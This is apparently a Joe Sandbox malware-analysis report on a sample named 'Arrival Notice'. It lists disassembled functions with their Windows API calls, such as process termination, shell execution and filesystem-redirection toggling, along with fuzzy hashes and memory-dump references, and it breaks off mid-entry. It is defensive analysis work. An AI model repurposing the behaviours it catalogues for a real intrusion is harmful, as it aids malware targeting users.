                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: 43eceead7df096fe4026a51bdb880d18dd782d3b068518e65de9c2a7b7ba3351
                  • Instruction ID: a7abb2f93cee44d5ce13d4cf037f519c0a441417a26fb570e69ff37a6d130726
                  • Opcode Fuzzy Hash: 43eceead7df096fe4026a51bdb880d18dd782d3b068518e65de9c2a7b7ba3351
                  • Instruction Fuzzy Hash: D4018475A01704BBEB105BE59C49A8EBF78EB45351F044076FA04A7290D6709800CFA4
                  Function 003B1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B1BF4
                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 003B1BFC
                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B1C07
                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B1C12
                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 003B1C1A
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B1C22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Virtual
                  • String ID:
                  • API String ID: 4278518827-0
                  • Opcode ID: fed131aaf644fec274fe2e477ee9e22a339aea59fab0005347a4d93403274fb4
                  • Instruction ID: c88bae3eef950f9c731f84fc1979ecaf30e65433b98c80b3d6d93a38d1c78ce0
                  • Opcode Fuzzy Hash: fed131aaf644fec274fe2e477ee9e22a339aea59fab0005347a4d93403274fb4
                  • Instruction Fuzzy Hash: CD0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F04411BA15C4BA42C7F5A864CFE5
                  Function 0041EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0041EB30
                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0041EB46
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0041EB55
                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0041EB64
                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0041EB6E
                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0041EB75
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                  • String ID:
                  • API String ID: 839392675-0
                  • Opcode ID: 609fd7c1ec0dd012a85971889b8fbfb3773a395bf93a4ee6aa31a165857ec7a8
                  • Instruction ID: 58f761503aff7063eca7e144b796ee2c0d13d400d96b63078220367da1c16914
                  • Opcode Fuzzy Hash: 609fd7c1ec0dd012a85971889b8fbfb3773a395bf93a4ee6aa31a165857ec7a8
                  • Instruction Fuzzy Hash: 09F0B47A242158BBE7205B529C4DEEF3E7CEFCBB11F044168FA01D1090D7A01A01CAB8
                  Function 00407439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?), ref: 00407452
                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00407469
                  • GetWindowDC.USER32(?), ref: 00407475
                  • GetPixel.GDI32(00000000,?,?), ref: 00407484
                  • ReleaseDC.USER32(?,00000000), ref: 00407496
                  • GetSysColor.USER32(00000005), ref: 004074B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                  • String ID:
                  • API String ID: 272304278-0
                  • Opcode ID: 5cca64582a7339f39bb6df878f1fcbd0e65ef0fa152b06e9645733a1848e73a6
                  • Instruction ID: 83653cd79341de5d15f911bebbbde1397db223ee9fffd4116fa19ef52651a35b
                  • Opcode Fuzzy Hash: 5cca64582a7339f39bb6df878f1fcbd0e65ef0fa152b06e9645733a1848e73a6
                  • Instruction Fuzzy Hash: E701DB31800214FFEB915F60DC49BAE7BB5FB05311F194075F915A21A1CF302E02AB19
                  Function 00411874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041187F
                  • UnloadUserProfile.USERENV(?,?), ref: 0041188B
                  • CloseHandle.KERNEL32(?), ref: 00411894
                  • CloseHandle.KERNEL32(?), ref: 0041189C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004118A5
                  • HeapFree.KERNEL32(00000000), ref: 004118AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                  • String ID:
                  • API String ID: 146765662-0
                  • Opcode ID: cb437b003b27bc660a7f53b61e6778ef2c8fcf092fd9f906965bf68d77137b37
                  • Instruction ID: cb05e75eb9119d1d17cd342e340685dd90bf7b85590a57da7b5a5404979aa149
                  • Opcode Fuzzy Hash: cb437b003b27bc660a7f53b61e6778ef2c8fcf092fd9f906965bf68d77137b37
                  • Instruction Fuzzy Hash: 56E0E53A206101BBDB416FA1ED4C90ABF39FF4AB22B148230F22581070CB329420DF58
                  Function 003BBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003BBEB3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: D%H$D%H$D%H$D%HD%H
                  • API String ID: 1385522511-521877798
                  • Opcode ID: 7f6ba42612004d9cc348312d1d9b0d1f2a4e41285dd0af78e0e51ff95ddf1202
                  • Instruction ID: 361af125778d537fd373978b63502fa5375481bf6d1cf026ce6fdbdc370dcebf
                  • Opcode Fuzzy Hash: 7f6ba42612004d9cc348312d1d9b0d1f2a4e41285dd0af78e0e51ff95ddf1202
                  • Instruction Fuzzy Hash: 97915B75A0020ADFCB19CF58C0906E9FBF5FF58318B25456EDA41ABB50DBB1E981CB90
                  Function 00437B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003D0242: EnterCriticalSection.KERNEL32(0048070C,00481884,?,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D024D
                    • Part of subcall function 003D0242: LeaveCriticalSection.KERNEL32(0048070C,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D028A
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 003D00A3: __onexit.LIBCMT ref: 003D00A9
                  • __Init_thread_footer.LIBCMT ref: 00437BFB
                    • Part of subcall function 003D01F8: EnterCriticalSection.KERNEL32(0048070C,?,?,003C8747,00482514), ref: 003D0202
                    • Part of subcall function 003D01F8: LeaveCriticalSection.KERNEL32(0048070C,?,003C8747,00482514), ref: 003D0235
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                  • String ID: +T@$5$G$Variable must be of type 'Object'.
                  • API String ID: 535116098-2858914595
                  • Opcode ID: fca28669ad41f7a03d0e0241bfffef82a60ab1e4fec2f9ac96ab0bdd0999a370
                  • Instruction ID: 902af46b9121949eed9c398130f1d71a605fb78b89198bb4cc7c1f23af4fbb67
                  • Opcode Fuzzy Hash: fca28669ad41f7a03d0e0241bfffef82a60ab1e4fec2f9ac96ab0bdd0999a370
                  • Instruction Fuzzy Hash: 1C919DB0604209EFCB24EF54D8919AEB7B1FF49304F10905EF8469B392DB79AE41CB59
                  Function 0041C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0041C6EE
                  • _wcslen.LIBCMT ref: 0041C735
                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0041C79C
                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0041C7CA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ItemMenu$Info_wcslen$Default
                  • String ID: 0
                  • API String ID: 1227352736-4108050209
                  • Opcode ID: b60fe3a0ad1afa740a647f426a3006f4b5a9063be028668c09ff2cbe4bd073ee
                  • Instruction ID: 51229b2d72e800d898b552d34889c53daa21c69eb13f621ccb93ec6905a23e16
                  • Opcode Fuzzy Hash: b60fe3a0ad1afa740a647f426a3006f4b5a9063be028668c09ff2cbe4bd073ee
                  • Instruction Fuzzy Hash: A551C1716843029BD711AF28CCC5BAF77E8AB45314F04092FF5A5D62E0DBB8D885CB5A
                  Function 0043AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                  Download Yara Rule
                  APIs
                  • ShellExecuteExW.SHELL32(0000003C), ref: 0043AEA3
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                  • GetProcessId.KERNEL32(00000000), ref: 0043AF38
                  • CloseHandle.KERNEL32(00000000), ref: 0043AF67
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseExecuteHandleProcessShell_wcslen
                  • String ID: <$@
                  • API String ID: 146682121-1426351568
                  • Opcode ID: 949dd2d5456a4d84013bcab715ed7a45d1453455cbddb8347a7e16e67e623107
                  • Instruction ID: 378bcf1c24b48a67cdd8ad5c5f9babb29e594164988503416fdf664e5d056f8c
                  • Opcode Fuzzy Hash: 949dd2d5456a4d84013bcab715ed7a45d1453455cbddb8347a7e16e67e623107
                  • Instruction Fuzzy Hash: 28716774A00614DFCB15DF64C485A9EBBF0EF09304F04849AE856AB7A2CB78ED45CB95
                  Function 0041719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00417206
                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0041723C
                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0041724D
                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004172CF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$AddressCreateInstanceProc
                  • String ID: DllGetClassObject
                  • API String ID: 753597075-1075368562
                  • Opcode ID: 79f0fe8f645456ad29fd650fd6da48438f85bb2fb2d189e735ab72990179915e
                  • Instruction ID: 5dcbb983e50ffc631666c192f78624f1d3c2484f91466f46e14151b7021291ca
                  • Opcode Fuzzy Hash: 79f0fe8f645456ad29fd650fd6da48438f85bb2fb2d189e735ab72990179915e
                  • Instruction Fuzzy Hash: 8541B171604204EFDB15CF54C884ADA7BB9EF48310F1480AEFD099F20AD7B9D986CBA4
                  Function 00443D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00443E35
                  • IsMenu.USER32(?), ref: 00443E4A
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00443E92
                  • DrawMenuBar.USER32 ref: 00443EA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$Item$DrawInfoInsert
                  • String ID: 0
                  • API String ID: 3076010158-4108050209
                  • Opcode ID: 38e676a1d2337c7b04b05a385397dbfdf6a96c75e0f7f7e2afc328eec8368240
                  • Instruction ID: b6584746936e8855273003ff9f42eef3c93ff32c4104fa1d80ced627a93190fb
                  • Opcode Fuzzy Hash: 38e676a1d2337c7b04b05a385397dbfdf6a96c75e0f7f7e2afc328eec8368240
                  • Instruction Fuzzy Hash: 8D418875A02209EFEB10DF50D880AAABBB9FF49751F14402AE915AB350D334AE01CF54
                  Function 0043C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                  • API String ID: 176396367-4004644295
                  • Opcode ID: f3129243059c14c0468a5412cc6641f1eb55e0fbdc5ddc539c9d88d397599f95
                  • Instruction ID: 92e3f44d62be930622c7e5ed89338b2401de44581198fea5b4b15a84b040218f
                  • Opcode Fuzzy Hash: f3129243059c14c0468a5412cc6641f1eb55e0fbdc5ddc539c9d88d397599f95
                  • Instruction Fuzzy Hash: 72310633A001698BCB21FF6C98D02BF33915BA9754F15902BE845BB344EB79CD4093A8
                  Function 00442F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00442F8D
                  • LoadLibraryW.KERNEL32(?), ref: 00442F94
                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00442FA9
                  • DestroyWindow.USER32(?), ref: 00442FB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$DestroyLibraryLoadWindow
                  • String ID: SysAnimate32
                  • API String ID: 3529120543-1011021900
                  • Opcode ID: ebaf1ee404eace6f77812c5864f42a4e71f6d23866fcce93449f14b6d180b6b9
                  • Instruction ID: ab0d3b6d8fa5c9d038e37c01f37c3ce9fa1eebd3e81d8506a68e2b31edbd97ed
                  • Opcode Fuzzy Hash: ebaf1ee404eace6f77812c5864f42a4e71f6d23866fcce93449f14b6d180b6b9
                  • Instruction Fuzzy Hash: D021F071200205ABFB104F64DD81FBB77BDEB59368FD0422AF910D2290C7B5DC45A768
                  Function 003D4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003D4D1E,003E28E9,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002), ref: 003D4D8D
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003D4DA0
                  • FreeLibrary.KERNEL32(00000000,?,?,?,003D4D1E,003E28E9,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002,00000000), ref: 003D4DC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: ae72666d7805065b507032903e398ea243cd4d068b27d8f615d9331694a95628
                  • Instruction ID: 41dd0e4fac51b5b38b3b62447b30e712d51773b1802ebb86467c397c7017166c
                  • Opcode Fuzzy Hash: ae72666d7805065b507032903e398ea243cd4d068b27d8f615d9331694a95628
                  • Instruction Fuzzy Hash: 84F06839541208BBDB525F90DC89B9DBFB5EF44752F050166FC05A2251DB355D40CF94
                  Function 003B4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E9C
                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003B4EAE
                  • FreeLibrary.KERNEL32(00000000,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-3689287502
                  • Opcode ID: 4f2042aa9e50e69859acf392c320ecb23883a9a26ef4862807ac6cfed141f617
                  • Instruction ID: 822b1e962a561b96b5b55c969501f909a4b21657c07cc25e6a37a14ce7e6eaac
                  • Opcode Fuzzy Hash: 4f2042aa9e50e69859acf392c320ecb23883a9a26ef4862807ac6cfed141f617
                  • Instruction Fuzzy Hash: 53E0CD39A035229BD2731B297C58B9F6554AF82F6770E4125FD04D2506DB64CD0189AD
                  Function 003B4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E62
                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003B4E74
                  • FreeLibrary.KERNEL32(00000000,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E87
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-1355242751
                  • Opcode ID: 0dca5675c43fa96af435169b61a815700dc7183c7def47bd8a69b0367bdeac93
                  • Instruction ID: f4deb2a6bea99d701bfaec45f2198e970e195191ee1b4ed51a6e5936b851a014
                  • Opcode Fuzzy Hash: 0dca5675c43fa96af435169b61a815700dc7183c7def47bd8a69b0367bdeac93
                  • Instruction Fuzzy Hash: EAD0C239503A216756631B247C08ECB2B18AF82B1930A0221BA04A2115CF24CD01C9EC
                  Function 0043A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcessId.KERNEL32 ref: 0043A427
                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0043A435
                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0043A468
                  • CloseHandle.KERNEL32(?), ref: 0043A63D
                  Memory Dump Source
